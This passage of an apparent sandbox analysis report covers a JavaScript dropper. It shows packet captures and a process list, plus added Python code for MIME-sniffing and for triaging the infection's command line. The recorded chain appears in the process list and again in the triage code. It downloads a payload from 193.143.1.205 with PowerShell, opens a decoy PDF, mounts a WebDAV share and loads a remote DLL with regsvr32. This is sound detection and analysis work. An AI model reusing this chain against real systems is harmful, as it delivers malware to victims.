                        Data Ascii: p,`G>0t#~hBvqxW/lzeP)i)%Nj4b/FcvQOt`{psBjK_~1DmM[9L/l4`U*;rfAnWB_)^oCeSC;i4b/FcvO
                        Jan 15, 2025 08:13:08.891086102 CET | 1236 | IN | Data Raw: 86 de 06 c7 86 12 43 a7 33 f5 cd 09 00 00 60 1a 7c b1 04 00 00 00 00 c0 97 64 a3 31 05 3b a7 70 60 68 1f 43 d3 81 a1 4f b7 26 86 9e 36 31 74 70 60 e8 db cb 2e 86 36 a7 85 b6 63 a1 cf ce 9f f7 8f b6 87 a6 e1 d0 cb 37 2f fd b1 a1 77 dd b1 a1 6d 0c
                        Data Ascii: C3`|d1;p`hCO&61tp`.6c7/wmM1~CrlvM}s_,%hLT]}lbu:0904zpap`}{+76z96tCoN%$)1&C{u`')6^
                        Jan 15, 2025 08:13:08.891096115 CET | 1236 | IN | Data Raw: 28 1d 18 fa a9 3f 30 d4 c5 d0 cb 26 86 9e 9f 35 31 f4 24 8c a1 af 87 31 b4 ef a1 a9 84 a6 1d b9 e5 18 7a da c6 d0 8b 14 43 af 9a 18 7a 7b db 1f 1b da c6 d0 47 13 43 19 0e dd 9e a9 6f 4e 00 00 00 d3 e0 8b 25 00 d8 4d 95 f7 e7 55 d2 c9 5a ae 24 17
                        Data Ascii: (?0&51$1zCz{GCoN%MUZ$M>la\yU.cZjW]g`Z^]~5W-qIae6d[&>+LW1:7zb7+Cz^m}Pwl(1t9L/`j5w.\y,Z*
                        Jan 15, 2025 08:13:08.891102076 CET | 1236 | IN | Data Raw: 8f 6e 8f 0e 06 31 f4 fd db 4b d9 94 9b 86 43 75 0f 6d 67 42 bb b1 50 15 43 af 25 86 1e 06 31 f4 e1 fa ea f1 e6 e6 b1 1c 43 39 36 74 5b a6 be 39 01 00 00 4c 83 2f 96 00 60 5a e1 5d b7 e6 9b f3 8f 63 72 df a8 af cc 04 7f 8e 0d 84 86 19 d4 d7 cf 1b
                        Data Ascii: n1KCumgBPC%1C96t[9L/`Z]crZia)seh*w6K_CU^|.%2F'Zrr%cAvtN{QF?X<0!t{&1qC
                        Jan 15, 2025 08:13:08.891105890 CET | 152 | IN | Data Raw: 53 d0 0a 9f 26 95 9f 29 77 99 43 4e 6b 4a 56 f9 e9 ca 85 e3 f0 a5 ac ff 79 00 79 26 f5 73 58 f3 93 00 26 e4 95 33 68 65 a5 ad 7f f3 9b 57 f3 29 3a 10 36 a7 f2 75 cc 15 c9 ca a8 5d ce a0 a3 ef 1f 79 e7 94 17 08 fb 37 12 3d 14 c0 84 16 8a 23 f8 dc
                        Data Ascii: S&)wCNkJVyy&sX&3heW):6u]y7=#,x`hM=C?1t8<%?04GCzZheSL}s_,{
                        Jan 15, 2025 08:13:08.891689062 CET | 1236 | IN | Data Raw: 31 30 30 30 0d 0a ec 68 17 f0 89 4a 7f 5b fe 6a c8 7c af be 7e 70 a9 d0 0b ca 25 d4 64 50 dd 40 53 e5 3c 38 38 d8 ef 7d 88 c8 ff 7a d0 4a 61 34 15 22 9d 44 73 b3 72 a6 8a 9a 7a e2 83 a3 34 20 13 6d 73 95 4a 27 aa b0 f1 85 39 c6 2b c4 29 73 55 85
                        Data Ascii: 1000hJ[j|~p%dP@S<88}zJa4"Dsrz4 msJ'9+)sUjcfVr3<r^D)h>c]Gj~l@gs0o{'_M1w/bxvMoHfK0UZv]LmBARrq5/X{Cz~bhlh
                        Jan 15, 2025 08:13:08.896003962 CET | 1236 | IN | Data Raw: 63 0a c0 97 63 f5 62 82 1d b5 e8 81 a1 12 43 af ae d2 81 a1 e5 18 7a ad 63 68 c5 43 76 e4 f6 31 74 7f 1e 43 4f 4f ee e6 31 f4 b2 89 a1 37 37 4f b7 e3 31 94 4d b9 1b 35 f5 cd 09 00 00 60 1a 7c b1 04 00 db e1 6f ad 3e 86 d6 94 d0 d1 93 25 6b ce b8
                        Data Ascii: ccbCzchCv1tCOO177O1M5`|o>%kP/f#))HMgo_#{k+M$OOzzsHa^r,*Y,,WUB5{i_}zqZKd/AX%a;6%4=]\?Vbm^M~
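
Session 0 above is a chunked application/pdf response whose first chunk (size 0x1f6a) begins with the %PDF-1.7 magic, so for this download the declared Content-Type and the body agree. The check below is an added example, not part of this report or of Joe Sandbox's own signature logic: it decodes the chunked transfer encoding from the captured "Data Raw" hex, sniffs the payload's magic bytes and compares the result with the declared Content-Type, which is the kind of test behind the "wrong headers with respect to MIME Content-Type" signature. The captured prefix is copied from the report and cut short, so the decoder has to cope with a truncated chunk; the PE-served-as-PDF stream is constructed here to show what a mismatch looks like.

```python
from typing import Optional, Tuple

# First bytes of the chunked body captured in session 0 (the "Data Raw" line),
# copied from the report and cut after the first "endobj"; the real chunk is
# 0x1f6a bytes long, so this capture is deliberately incomplete.
CAPTURED_BODY_PREFIX = bytes.fromhex(
    "31 66 36 61 0d 0a 25 50 44 46 2d 31 2e 37 0a 25 bf f7 a2 fe 0a 31 20 30 20 "
    "6f 62 6a 0a 3c 3c 20 2f 50 61 67 65 73 20 33 20 30 20 52 20 2f 54 79 70 65 "
    "20 2f 43 61 74 61 6c 6f 67 20 3e 3e 0a 65 6e 64 6f 62 6a"
)

# Constructed (not from the capture): a PE header stub sent as one chunk while
# the server claims application/pdf, the shape of download the check should flag.
CONSTRUCTED_PE_AS_PDF = b"4\r\nMZ\x90\x00\r\n0\r\n\r\n"

# Magic-byte table for the formats that matter in a downloader triage.
MAGIC = [
    (b"%PDF-", "application/pdf"),
    (b"MZ", "application/vnd.microsoft.portable-executable"),
    (b"PK\x03\x04", "application/zip"),
    (b"\x7fELF", "application/x-executable"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"GIF8", "image/gif"),
]


def decode_chunked(raw: bytes) -> Tuple[bytes, bool]:
    """Decode an HTTP/1.1 chunked body. Returns (payload, complete); a truncated
    capture yields the bytes that were present and complete=False."""
    out, pos, complete = bytearray(), 0, False
    while True:
        eol = raw.find(b"\r\n", pos)
        if eol < 0:
            break                                   # chunk-size line cut off
        size_field = raw[pos:eol].split(b";", 1)[0].strip()   # drop chunk extensions
        if not size_field:
            break
        size = int(size_field.decode("ascii"), 16)
        pos = eol + 2
        if size == 0:
            complete = True                         # last-chunk marker seen
            break
        chunk = raw[pos:pos + size]
        out += chunk
        if len(chunk) < size:
            break                                   # data cut off mid-chunk
        pos += size + 2                             # skip chunk data and its CRLF
    return bytes(out), complete


def sniff_type(payload: bytes) -> Optional[str]:
    """Identify the payload from its leading bytes; None when nothing matches."""
    for magic, mime in MAGIC:
        if payload.startswith(magic):
            return mime
    head = payload[:512].lstrip().lower()
    if head.startswith(b"<!doctype html") or head.startswith(b"<html"):
        return "text/html"
    return None


def content_type_matches(declared: str, payload: bytes) -> bool:
    """False only when the magic positively identifies a type other than the
    declared one; an unrecognised body or a generic octet-stream is not a mismatch."""
    declared_mime = declared.split(";", 1)[0].strip().lower()
    observed = sniff_type(payload)
    if observed is None or declared_mime == "application/octet-stream":
        return True
    return observed == declared_mime


def check_response(content_type: str, body: bytes, chunked: bool) -> dict:
    """Summarise one captured response: declared vs observed type, and whether
    the capture contained the whole body."""
    payload, complete = decode_chunked(body) if chunked else (body, True)
    return {
        "declared": content_type.split(";", 1)[0].strip().lower(),
        "observed": sniff_type(payload),
        "match": content_type_matches(content_type, payload),
        "complete": complete,
        "bytes": len(payload),
    }


if __name__ == "__main__":
    print(check_response("application/pdf", CAPTURED_BODY_PREFIX, chunked=True))
    print(check_response("application/pdf", CONSTRUCTED_PE_AS_PDF, chunked=True))
```

The decoder reports `complete=False` for the report's capture because only the first 63 payload bytes of an 8042-byte chunk are on the page; a verdict on a partial body is still useful, since the magic sits in the first few bytes, but the `complete` flag keeps that caveat attached to the result.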


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        1 | 192.168.2.5 | 49705 | 193.143.1.205 | 8888 | 3720 | C:\Windows\System32\net.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Jan 15, 2025 08:13:10.433887959 CET | 107 | OUT | OPTIONS / HTTP/1.1
                        Connection: Keep-Alive
                        User-Agent: DavClnt
                        translate: f
                        Host: 193.143.1.205:8888
                        Jan 15, 2025 08:13:11.238305092 CET | 237 | IN | HTTP/1.1 500 Internal Server Error
                        Server: nginx/1.22.1
                        Date: Wed, 15 Jan 2025 07:13:11 GMT
                        Content-Type: text/plain; charset=utf-8
                        Content-Length: 22
                        Connection: keep-alive
                        X-Content-Type-Options: nosniff
                        Data Raw: 49 6e 74 65 72 6e 61 6c 20 73 65 72 76 65 72 20 65 72 72 6f 72 0a
                        Data Ascii: Internal server error


                        Target ID:0
                        Start time:02:13:03
                        Start date:15/01/2025
                        Path:C:\Windows\System32\wscript.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1475127682155276.js"
                        Imagebase:0x7ff765050000
                        File size:170'496 bytes
                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:1
                        Start time:02:13:04
                        Start date:15/01/2025
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll
                        Imagebase:0x7ff73bce0000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:02:13:04
                        Start date:15/01/2025
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:02:13:04
                        Start date:15/01/2025
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
                        Imagebase:0x7ff7be880000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"
                        Imagebase:0x7ff686a00000
                        File size:5'641'176 bytes
                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:6
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd /c net use \\193.143.1.205@8888\davwwwroot\
                        Imagebase:0x7ff73bce0000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Windows\System32\net.exe
                        Wow64 process (32bit):false
                        Commandline:net use \\193.143.1.205@8888\davwwwroot\
                        Imagebase:0x7ff7a4e70000
                        File size:59'904 bytes
                        MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                        Imagebase:0x7ff6413e0000
                        File size:3'581'912 bytes
                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:9
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Imagebase:0x7ff7e52b0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:10
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1680,i,15353841458623981023,14574021241036116658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                        Imagebase:0x7ff6413e0000
                        File size:3'581'912 bytes
                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false
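
The command line recorded for Target ID 1 (cmd.exe) is the whole infection chain in one string: PowerShell fetches invoice.php and writes it as invoice.pdf, `start` opens the decoy, `net use` mounts a WebDAV share and `regsvr32 /s` loads a DLL from it. The UNC form `\\host@port\DavWWWRoot\file` is the Windows WebClient (WebDAV Mini-Redirector) syntax: `@port` selects the TCP port, `@SSL` selects HTTPS, and `DavWWWRoot` is a keyword for the server root, so the path resolves to `http://host:port/file`; the `OPTIONS /` request with User-Agent `DavClnt` to 193.143.1.205:8888 in session 1 is that client probing the root. The triage below is an added example, not part of this report or of Joe Sandbox, and serves both session 1 and the process list: it splits the command line into its `&&` stages, rewrites each WebDAV UNC to the URL the WebClient service will request, and tags the stages a detection rule would key on. The only input is the command line copied from the report; the `@SSL` handling is a generalisation the report itself does not exercise.

```python
import re
from typing import Dict, List

# Command line recorded for Target ID 1 (cmd.exe) in the report above.
CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /c powershell.exe -Command '
    r'"Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf '
    r'http://193.143.1.205/invoice.php"'
    r'&&start C:\Users\user\AppData\Local\Temp\invoice.pdf'
    r'&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s '
    r'\\193.143.1.205@8888\davwwwroot\13188269477300.dll'
)

# WebClient-style UNC: \\host[@SSL][@port]\path ; DavWWWRoot in the path means "server root".
UNC_RE = re.compile(
    r'\\\\(?P<host>[^\\@\s"]+)(?P<ssl>@SSL)?(?:@(?P<port>\d+))?(?P<path>\\[^\s"&|]*)',
    re.IGNORECASE,
)
URL_RE = re.compile(r'https?://[^\s"\'<>]+', re.IGNORECASE)
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def split_stages(cmdline: str) -> List[str]:
    """Split a cmd.exe command line on '&&' that sits outside double quotes."""
    stages, buf, in_quote, i = [], [], False, 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == '"':
            in_quote = not in_quote
        if not in_quote and cmdline.startswith("&&", i):
            stages.append("".join(buf).strip())
            buf, i = [], i + 2
            continue
        buf.append(ch)
        i += 1
    stages.append("".join(buf).strip())
    return [s for s in stages if s]


def strip_cmd_prefix(stage: str) -> str:
    """Drop a leading '"...\\cmd.exe" /c' or 'cmd /c' wrapper so the real command is first."""
    return re.sub(r'^(?:"[^"]*cmd\.exe"|cmd(?:\.exe)?)\s+/c\s+', "", stage, flags=re.IGNORECASE)


def unc_to_url(unc: str) -> str:
    """Rewrite a WebClient UNC path to the HTTP(S) URL the Mini-Redirector requests."""
    m = UNC_RE.fullmatch(unc.strip())
    if not m:
        raise ValueError(f"not a WebDAV-style UNC path: {unc!r}")
    scheme = "https" if m.group("ssl") else "http"
    netloc = m.group("host") + (f":{m.group('port')}" if m.group("port") else "")
    parts = [p for p in m.group("path").split("\\") if p]
    if parts and parts[0].lower() == "davwwwroot":
        parts = parts[1:]                    # keyword for the web root, not a directory
    return f"{scheme}://{netloc}/" + "/".join(parts)


def triage(cmdline: str) -> List[Dict[str, object]]:
    """Tag each stage of the chain with the behaviour a detection would key on."""
    findings: List[Dict[str, object]] = []
    for n, raw_stage in enumerate(split_stages(cmdline)):
        stage = strip_cmd_prefix(raw_stage)
        low = stage.lower()
        uncs = [m.group(0) for m in UNC_RE.finditer(stage)]
        if "invoke-webrequest" in low or re.search(r"\biwr\b", low):
            for url in URL_RE.findall(stage):
                host = re.sub(r"^https?://", "", url, flags=re.I).split("/")[0].split(":")[0]
                bare = " (bare IP)" if IPV4_RE.match(host) else ""
                findings.append({"stage": n, "tag": "powershell_download", "detail": url + bare})
        if low.startswith("start "):
            findings.append({"stage": n, "tag": "decoy_opened", "detail": stage.split(None, 1)[1]})
        if low.startswith("net use") and uncs:
            findings.append({"stage": n, "tag": "webdav_mount", "detail": unc_to_url(uncs[0])})
        if low.startswith("regsvr32") and uncs:
            findings.append({"stage": n, "tag": "regsvr32_remote_dll", "detail": unc_to_url(uncs[0])})
    return findings


if __name__ == "__main__":
    for f in triage(CMDLINE):
        print(f"stage {f['stage']}: {f['tag']:22} {f['detail']}")
```

Resolving the UNC explains why session 1 shows `net.exe` talking HTTP to port 8888 rather than SMB: the share mount is a WebDAV `OPTIONS /`, and the DLL that `regsvr32 /s` later asks for would be fetched the same way, which is also why a 500 from the server does not by itself mean the chain stops. For hunting, the `regsvr32_remote_dll` tag (regsvr32 with a `\\host@port\` argument) is the highest-signal stage; the `powershell_download` to a bare IP and the `net use` to an `@port` share are the corroborating ones.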

                        No disassembly